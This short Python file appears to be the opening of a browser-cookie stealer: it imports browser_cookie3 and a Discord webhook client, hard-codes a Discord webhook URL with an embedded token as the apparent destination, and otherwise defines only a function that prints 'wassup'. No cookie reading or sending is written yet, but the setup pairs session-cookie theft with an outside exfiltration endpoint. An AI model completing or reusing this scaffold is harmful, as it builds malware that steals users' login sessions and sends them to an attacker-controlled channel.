import browser_cookie3, requests
import os
from discord_webhook import DiscordWebhook, DiscordEmbed


webhook = "https://discordapp.com/api/webhooks/1005221186327814245/iAxT051uX2N4LR30j8VjBkTD504GsrSThRmaMVeE5MugNLBvAdjb4-ZkdX2mYMbGF10X"


def hi():
    print("wassup")


    
